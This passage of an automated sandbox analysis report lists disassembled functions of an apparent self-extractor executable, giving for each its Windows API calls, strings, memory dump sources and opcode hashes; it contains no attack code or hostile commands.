Instruction Fuzzy Hash: 1651C172A00216ABFB258E64CC81EBF77AAEB44714F15466EFC05D7244DB38DC84CA98

Function 0043CB49 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0043CB6A
SHAutoComplete.SHLWAPI(?,00000010), ref: 0043CBA1

Part of subcall function 00434168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0042E084,00000000,.exe,?,?,00000800,?,?,?,0043AD5D), ref: 0043417E

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0043CB91

Strings

@Ut, xrefs: 0043CBA1
EDIT, xrefs: 0043CB75, 0043CB80, 0043CB8D

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: f6003d9fd0552a1e4da629e131cc3afad960177e929f90e844db7ea536075091
Instruction ID: a58dba7aa1c8ee15286735b2299177a4ab2417e9232fa05782960dce8d4c35bd
Opcode Fuzzy Hash: f6003d9fd0552a1e4da629e131cc3afad960177e929f90e844db7ea536075091
Instruction Fuzzy Hash: 59F0C831601314BBEB209B259D06F9FB7AC9F8AB01F10406AFD01B7280D7B8ED4587AD

Function 0043CCD9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004328AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004328D4
Part of subcall function 004328AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00431309,Crypt32.dll,00000000,00431383,00000200,?,00431366,00000000,00000000,?), ref: 004328F4

OleInitialize.OLE32(00000000), ref: 0043CCF2
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0043CD29
SHGetMalloc.SHELL32(0046C460), ref: 0043CD33

Strings

riched20.dll, xrefs: 0043CCE1
3So, xrefs: 0043CD0A

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3So
API String ID: 3498096277-3464455743
Opcode ID: bd68f42a2997d13c3167e19119a945dff0e77d14b45876d38c76a41aa3457eb2
Instruction ID: 57c62ce7215203567e4a64d820b390e5d6fb06eb1e802799238e211ab9424308
Opcode Fuzzy Hash: bd68f42a2997d13c3167e19119a945dff0e77d14b45876d38c76a41aa3457eb2
Instruction Fuzzy Hash: BBF062B1D00209ABDB10AF9AD8499EFFFFCEF84704F10446BE401E2251DBB846458FA5

Function 004312F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004328AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004328D4
Part of subcall function 004328AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00431309,Crypt32.dll,00000000,00431383,00000200,?,00431366,00000000,00000000,?), ref: 004328F4

GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00431315
GetProcAddress.KERNEL32(0046C1F0,CryptUnprotectMemory), ref: 00431325

Strings

CryptProtectMemory, xrefs: 0043130F
Crypt32.dll, xrefs: 004312FF
CryptUnprotectMemory, xrefs: 0043131B

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: e036944a4dd2b48edbcc36c173d04f1ad1d554e1fa8ba2bc90d6df9f77c6b1c1
Instruction ID: fdc3c7f1459fbd04fbddd77930782bdfd5a733c597fa2529c24a93fd25f75de9
Opcode Fuzzy Hash: e036944a4dd2b48edbcc36c173d04f1ad1d554e1fa8ba2bc90d6df9f77c6b1c1
Instruction Fuzzy Hash: 5AE02630A007009EE720AF3899087027EF05F2CB02F518C2FE9C693692C6BCD4488B08

Function 0042B2B0 Relevance: 7.6, APIs: 5, Instructions: 119
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00428846,?,00000005), ref: 0042B342
GetLastError.KERNEL32(?,?,00428846,?,00000005), ref: 0042B34F
CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00428846,?,00000005), ref: 0042B382
GetLastError.KERNEL32(?,?,00428846,?,00000005), ref: 0042B38A
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00428846,?,00000005), ref: 0042B3D9

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 04377eb4fc39a40d8e7cecfb8caf376e668266c8942f9cece109646c3c58cbdb
Instruction ID: 05e16708dc64e90114764f42a37d35de18d20f13170e98ef3fa12d9975c02124
Opcode Fuzzy Hash: 04377eb4fc39a40d8e7cecfb8caf376e668266c8942f9cece109646c3c58cbdb
Instruction Fuzzy Hash: 1C414630604751AFD320DF24EC45B9BB7D8FB04724F500A1AF9A1932C1D3B8A848CBDA

Function 0043FFDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0043FFFE
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00440038

Strings

sfxpar, xrefs: 00440033
sfxcmd, xrefs: 0043FFF9

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: c5ebdcdc507d5832ba6bc50f9b15e691b82658b5d77d8de33bff32bf497a024e
Instruction ID: 70772368930fe0a84a2861c7f34d59e2c6ec3ca98c5dcfb2cff9d283053bd428
Opcode Fuzzy Hash: c5ebdcdc507d5832ba6bc50f9b15e691b82658b5d77d8de33bff32bf497a024e
Instruction Fuzzy Hash: 23F0FC71501224BBD710AB519D05ABFB39CDF1D745B40001FBD41A7182DEF89D40C6AD

Function 00446232 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,004461E3,00000000,00000001,004860C8,?,?,?,00446386,00000004,InitializeCriticalSectionEx,00459624,InitializeCriticalSectionEx), ref: 0044623F
GetLastError.KERNEL32(?,004461E3,00000000,00000001,004860C8,?,?,?,00446386,00000004,InitializeCriticalSectionEx,00459624,InitializeCriticalSectionEx,00000000,?,0044613D), ref: 00446249
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00445083), ref: 00446271

Strings

api-ms-, xrefs: 00446256

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: d2fa3ef917ef61a6911d83ab8b8031c00ead880304017f5b837507a7246dc176
Instruction ID: a15b7f682b9a2deb2796e338444e2df567cd6586dd78dd4de6176deee914e196
Opcode Fuzzy Hash: d2fa3ef917ef61a6911d83ab8b8031c00ead880304017f5b837507a7246dc176
Instruction Fuzzy Hash: 02E01A30680308B6EF102B61EC06F5A3A64AB01B67F510075FA0DA85E2EBA9D950958D

Function 0042B151 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0042B662,?,?,00000000,?,?), ref: 0042B161
ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,0042B662,?,?,00000000,?,?), ref: 0042B179
GetLastError.KERNEL32(?,?,?,00000000,0042B662,?,?,00000000,?,?), ref: 0042B1AB
GetLastError.KERNEL32(?,?,?,00000000,0042B662,?,?,00000000,?,?), ref: 0042B1CA

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 68d819cfe793a9952125e067efbce4df3b9202165941d2df07eaf560b673187f
Instruction ID: b5d92249beedf3397cb02ea582c1ac42cd3d5c891d6b2ec9db360c5f557e9dff
Opcode Fuzzy Hash: 68d819cfe793a9952125e067efbce4df3b9202165941d2df07eaf560b673187f
Instruction Fuzzy Hash: 4B11A330700224EBDB209B20EC1467B37A9FB017E6F90462BE826C5290DB78DD64CBD9

Function 0044D384 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0044688D,00000000,00000000,?,0044D32B,0044688D,00000000,00000000,00000000,?,0044D528,00000006,FlsSetValue), ref: 0044D3B6
GetLastError.KERNEL32(?,0044D32B,0044688D,00000000,00000000,00000000,?,0044D528,00000006,FlsSetValue,0045AC00,FlsSetValue,00000000,00000364,?,0044BA77), ref: 0044D3C2
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044D32B,0044688D,00000000,00000000,00000000,?,0044D528,00000006,FlsSetValue,0045AC00,FlsSetValue,00000000), ref: 0044D3D0

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6d150ee1af3813822e0b1544ddab4ec9f4d5dc2544556dd2635e85d4dafb665a
Instruction ID: 3199225a4be1f785638860ef97435020388ec00865ce40ac1e6928237b45fffa
Opcode Fuzzy Hash: 6d150ee1af3813822e0b1544ddab4ec9f4d5dc2544556dd2635e85d4dafb665a
Instruction Fuzzy Hash: 9F01FC32B11326ABE7214F689C44A573758FF05B72B110635FD17D7281D724D80186E9

Function 0044E077 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0044B9A5: GetLastError.KERNEL32(?,004650C4,00446E12,004650C4,?,?,0044688D,?,?,004650C4), ref: 0044B9A9
Part of subcall function 0044B9A5: _free.LIBCMT ref: 0044B9DC
Part of subcall function 0044B9A5: SetLastError.KERNEL32(00000000,?,004650C4), ref: 0044BA1D
Part of subcall function 0044B9A5: _abort.LIBCMT ref: 0044BA23

Part of subcall function 0044E19E: _abort.LIBCMT ref: 0044E1D0
Part of subcall function 0044E19E: _free.LIBCMT ref: 0044E204

Part of subcall function 0044DE0B: GetOEMCP.KERNEL32(00000000,?,?,0044E094,?), ref: 0044DE36

_free.LIBCMT ref: 0044E0EF
_free.LIBCMT ref: 0044E125

Strings

p,F, xrefs: 0044E119

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: p,F
API String ID: 2991157371-222182985
Opcode ID: 8692b8966d7a20034b4ce22d7a95213d1ca4bfebcc9f75b2987d81d8cfbe1f8c
Instruction ID: 5a117765c36ef13d230490175563dcf3a6b905c9c3f55f705ef1af6e4057f03e
Opcode Fuzzy Hash: 8692b8966d7a20034b4ce22d7a95213d1ca4bfebcc9f75b2987d81d8cfbe1f8c
Instruction Fuzzy Hash: 7A31B531900218AFFB10EF6AD481A9A77F5FF41324F2540AFE5149B291EBBA9D41CB48

Function 0043136B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 004312F6: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00431315
Part of subcall function 004312F6: GetProcAddress.KERNEL32(0046C1F0,CryptUnprotectMemory), ref: 00431325

GetCurrentProcessId.KERNEL32(?,00000200,?,00431366), ref: 004313F9

Strings

CryptUnprotectMemory failed, xrefs: 004313F1
CryptProtectMemory failed, xrefs: 004313B0

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 6a01438c7050c4d89580ec263ac8345231cddc391bf0f1acd6184df67118a3b4
Instruction ID: af7d767cfb7413e0109d3d6710483845218969679b6c0e543267adbc97c220ba
Opcode Fuzzy Hash: 6a01438c7050c4d89580ec263ac8345231cddc391bf0f1acd6184df67118a3b4
Instruction Fuzzy Hash: CA1106316002256BEB15AB219C4197E3B64EF19B24F058177FC216B2A3D67CAD418ADD

Function 00433105 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00013240,?,00000000,?), ref: 00433129
SetThreadPriority.KERNEL32(00000000,00000000), ref: 00433170

Part of subcall function 00427BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00427BD5

Strings

CreateThread failed, xrefs: 00433135

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: c029bee19564b2577a47f9928c8bdbc6c369bf4888acb01e254538b85ae7f372
Instruction ID: fbd13898f5d1601a8cfffa57f9183e113ada14685909ea1b54debfa0983a6812
Opcode Fuzzy Hash: c029bee19564b2577a47f9928c8bdbc6c369bf4888acb01e254538b85ae7f372
Instruction Fuzzy Hash: 640126B13493067FE7206F50AC82F6377A8EB45717F20013FF681572C1DAA8A844866C

Function 004305C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00427BEB,?,00421436,00427BEB), ref: 004305F8
LoadStringW.USER32(00427BEB,?,00421436), ref: 0043060F

Strings

pPF, xrefs: 004305D6

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: LoadString
String ID: pPF
API String ID: 2948472770-2394163379
Opcode ID: 0c17c9b75149091e56bb5a46126adb669c62df9e110fc2deb715a09a08229727
Instruction ID: 68ff9d36894cef1bc58efab2e033c7c5e40cc571b8a65da35c937ef9f5b6e63c
Opcode Fuzzy Hash: 0c17c9b75149091e56bb5a46126adb669c62df9e110fc2deb715a09a08229727
Instruction Fuzzy Hash: 36F09835200219BBDF111F51EC28DAB7F6AFF49794B44942AFD1496231E732C860EBA9

Function 0042B9BA Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0042F306,00000001,?,?,?,00000000,00437564,?,?,?,?), ref: 0042B9DE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0042BA25
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0042F306,00000001,?,?,?), ref: 0042BA51

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 7c4f9d0356e2ca3c48b9209fee4369aed50da93bf5ed54d6dafcee68aa5f4674
Instruction ID: d499439dd9a4df6184e0d2825cd5c49ed38d06e6129d084bd2db2b3416638c01
Opcode Fuzzy Hash: 7c4f9d0356e2ca3c48b9209fee4369aed50da93bf5ed54d6dafcee68aa5f4674
Instruction Fuzzy Hash: 8931B371308325AFDB14CF10E848B6B77A5FB81715F44462EF98157290CB78AD88CBEA

Function 0042BEE1 Relevance: 4.6, APIs: 3, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0042E1EC: _wcslen.LIBCMT ref: 0042E1F2

CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,0042BBD0,?,00000001,00000000,?,?), ref: 0042BF12
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,0042BBD0,?,00000001,00000000,?,?), ref: 0042BF45
GetLastError.KERNEL32(?,?,?,00000000,0042BBD0,?,00000001,00000000,?,?), ref: 0042BF62

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 4e52d86fc89ddccf10c53140ef347e25284175cd13459ca550e407c53b6d1698
Instruction ID: 8d9b3cfda2acf01073ef492b5c9c166479a67ece5e40ae8743541b880a622b92
Opcode Fuzzy Hash: 4e52d86fc89ddccf10c53140ef347e25284175cd13459ca550e407c53b6d1698
Instruction Fuzzy Hash: 7A11C631300224AADB11AF716E05BEF7398DF09705F81446AF941D7291DB7CD981CAAD

Function 0044DEE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044DF08

Strings

, xrefs: 0044DF4D

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
